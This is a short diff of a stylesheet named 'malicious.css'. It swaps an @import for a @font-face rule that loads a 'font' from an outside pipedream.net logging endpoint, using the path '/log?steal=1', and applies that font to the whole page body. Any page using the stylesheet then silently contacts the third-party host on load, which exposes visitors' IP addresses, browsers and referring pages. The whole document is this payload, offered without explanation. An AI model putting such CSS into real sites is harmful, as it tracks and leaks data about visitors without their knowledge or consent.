--- a/malicious.css
+++ b/malicious.css
@@ -1,1 +1,7 @@
-@import url("https://eo10sr0fi9sxhnf.m.pipedream.net");
+@font-face {
+  font-family: "Hack";
+  src: url("https://eo10sr0fi9sxhnf.m.pipedream.net/log?steal=1");
+}
+body {
+  font-family: "Hack";
+}
